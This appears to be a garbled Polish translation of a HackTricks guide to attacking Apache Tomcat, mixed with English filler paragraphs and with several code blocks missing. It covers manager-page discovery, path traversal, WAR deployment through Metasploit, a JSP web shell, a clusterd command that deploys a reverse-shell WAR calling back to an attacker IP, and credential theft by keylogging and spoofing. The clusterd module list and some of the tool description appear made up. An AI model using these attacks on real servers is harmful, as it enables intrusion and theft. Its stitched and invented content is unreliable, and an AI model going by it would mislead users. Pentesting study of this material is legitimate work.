<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
Znajdź najważniejsze podatności, aby móc je szybko naprawić. Intruder śledzi powierzchnię ataku, wykonuje proaktywne skanowanie zagrożeń, znajduje problemy w całym stosie technologicznym, od interfejsów API po aplikacje internetowe i systemy chmurowe. [**Wypróbuj za darmo**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) już dziś.
Identyfikacja dokładnych lokalizacji katalogów **`/manager`** i **`/host-manager`** jest kluczowa, ponieważ ich nazwy mogą być zmienione. Zaleca się przeprowadzenie ataku brute-force w celu zlokalizowania tych stron.
Katalog **`/manager/html`** jest szczególnie wrażliwy, ponieważ umożliwia przesyłanie i wdrażanie plików WAR, co może prowadzić do wykonania kodu. Ten katalog jest chroniony przez podstawową autoryzację HTTP, a powszechne dane uwierzytelniające to:
Podatność CVE-2007-1860 w `mod_jk` umożliwia podwójne kodowanie URL w celu przechodzenia ścieżek, umożliwiając nieautoryzowany dostęp do interfejsu zarządzania za pomocą specjalnie spreparowanego adresu URL.
Wersje Apache Tomcat od 4.x do 7.x zawierają przykładowe skrypty, które są podatne na ujawnienie informacji i ataki typu cross-site scripting (XSS). Te skrypty, wymienione wyczerpująco, powinny być sprawdzane pod kątem nieautoryzowanego dostępu i potencjalnego wykorzystania. Znajdź [więcej informacji tutaj](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)
### **Wykorzystanie podatności na przechodzenie ścieżek**
W niektórych [**podatnych konfiguracjach Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) można uzyskać dostęp do chronionych katalogów w Tomcat, używając ścieżki: `/..;/`
Będziesz mógł wdrożyć plik WAR tylko jeśli masz **wystarczające uprawnienia** (role: **admin**, **manager** i **manager-script**). Szczegóły te można znaleźć w pliku _tomcat-users.xml_, zwykle zdefiniowanym w `/usr/share/tomcat9/etc/tomcat-users.xml` (różni się w zależności od wersji) (zobacz sekcję [POST](tomcat.md#post)).
Metasploit jest jednym z najpopularniejszych narzędzi do testowania penetracyjnego, które jest szeroko stosowane w celu identyfikacji i wykorzystania podatności w systemach. Jest to framework, który umożliwia automatyzację procesu testowania penetracyjnego i dostarcza szeroką gamę modułów i narzędzi, które mogą być wykorzystane do atakowania różnych systemów i aplikacji.
Metasploit oferuje wiele modułów, które są specjalnie zaprojektowane do atakowania usług sieciowych, takich jak Tomcat. Moduły te mogą być wykorzystane do identyfikacji podatności, zdalnego wykonania kodu, przejęcia sesji i wielu innych ataków.
Aby użyć Metasploita w celu atakowania usługi Tomcat, należy najpierw zidentyfikować podatności wersji Tomcat, z którym się pracuje. Następnie można użyć odpowiedniego modułu Metasploita, takiego jak `exploit/multi/http/tomcat_mgr_deploy`, aby wykorzystać znane podatności i zdobyć dostęp do systemu.
Metasploit oferuje również wiele innych modułów i narzędzi, które mogą być wykorzystane do testowania penetracyjnego różnych usług sieciowych. Jest to niezwykle potężne narzędzie, które może być używane zarówno przez hakerów, jak i profesjonalistów ds. bezpieczeństwa w celu identyfikacji i zabezpieczania podatności w systemach.
A reverse shell is a type of shell in which the target machine initiates the connection to the attacker's machine. This allows the attacker to gain remote access to the target machine and execute commands.
To establish a reverse shell, the attacker needs to set up a listener on their machine and configure the target machine to connect back to it. This can be done by exploiting vulnerabilities in network services or by tricking the target into running malicious code.
Once the connection is established, the attacker can interact with the target machine's command prompt and execute commands as if they were physically present on the machine. This can be useful for performing various tasks, such as exploring the file system, exfiltrating data, or escalating privileges.
It is important to note that using reverse shells for unauthorized access to systems is illegal and unethical. Reverse shells should only be used for legitimate purposes, such as penetration testing or authorized remote administration.
Bind shell to technika, która umożliwia zdalne połączenie z serwerem poprzez otwarcie portu i nasłuchiwanie na nim. Gdy atakujący nawiąże połączenie, uzyskuje pełną kontrolę nad systemem. Jest to przydatne narzędzie podczas testów penetracyjnych, które umożliwia zdalne wykonywanie poleceń na zdalnym serwerze.
Culsterd is a tool that can be used to exploit vulnerabilities in Apache Tomcat. It provides various modules that can be used to perform different types of attacks.
Once Culsterd is installed, you can use it to exploit vulnerabilities in Apache Tomcat. The tool provides several modules that can be used for different purposes:
- **ajp_fuzz**: This module can be used to fuzz the AJP protocol and discover potential vulnerabilities.
- **ajp_lfi**: This module can be used to exploit a Local File Inclusion (LFI) vulnerability in Apache Tomcat.
- **ajp_rce**: This module can be used to exploit a Remote Code Execution (RCE) vulnerability in Apache Tomcat.
- **ajp_shell**: This module can be used to gain a shell on the target system through the AJP protocol.
- **ajp_upload**: This module can be used to upload files to the target system through the AJP protocol.
- **ajp_webshell**: This module can be used to deploy a web shell on the target system through the AJP protocol.
To use a specific module, you can run the following command:
Replace `<target_ip>` with the IP address of the target system, `<target_port>` with the port number of the target system, and `<command>` with the command you want to execute on the target system.
#### Conclusion
Culsterd is a powerful tool that can be used to exploit vulnerabilities in Apache Tomcat. By using its various modules, you can perform different types of attacks and gain unauthorized access to the target system. However, it is important to use this tool responsibly and only on systems that you have permission to test.
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
### Metoda manualna - Web shell
Utwórz plik **index.jsp** o [takiej zawartości](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):
Możesz również zainstalować to (umożliwia przesyłanie, pobieranie i wykonywanie poleceń): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
5.**Ataki słownikowe**: Wykorzystaj listę popularnych haseł lub słowników, aby przeprowadzić atak słownikowy na stronie logowania Tomcat.
6.**Złamanie haseł**: Wykorzystaj techniki złamania haseł, takie jak ataki brute-force, ataki słownikowe lub ataki z wykorzystaniem tablic tęczowych, aby odzyskać hasła użytkowników.
7.**Podatności aplikacji**: Wykorzystaj podatności w aplikacji Tomcat, które mogą umożliwić zdobycie poświadczeń.
8.**Przechwytywanie pakietów**: Przechwyć pakiety sieciowe, aby znaleźć dane logowania przesyłane przez użytkowników.
9.**Keylogging**: Zainstaluj keylogger na komputerze użytkownika, aby rejestrować wszystkie wprowadzane przez niego dane, w tym dane logowania do Tomcat.
10.**Spoofing**: Wykorzystaj technikę spoofingu, aby podszyć się pod prawidłową stronę logowania Tomcat i przechwycić dane logowania użytkowników.
Znajdź najważniejsze podatności, aby szybko je naprawić. Intruder śledzi powierzchnię ataku, wykonuje proaktywne skanowanie zagrożeń, znajduje problemy w całym stosie technologicznym, od interfejsów API po aplikacje internetowe i systemy chmurowe. [**Wypróbuj go za darmo**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) już dziś.
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć **reklamę swojej firmy w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi trikami hakerskimi, przesyłając PR-y do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.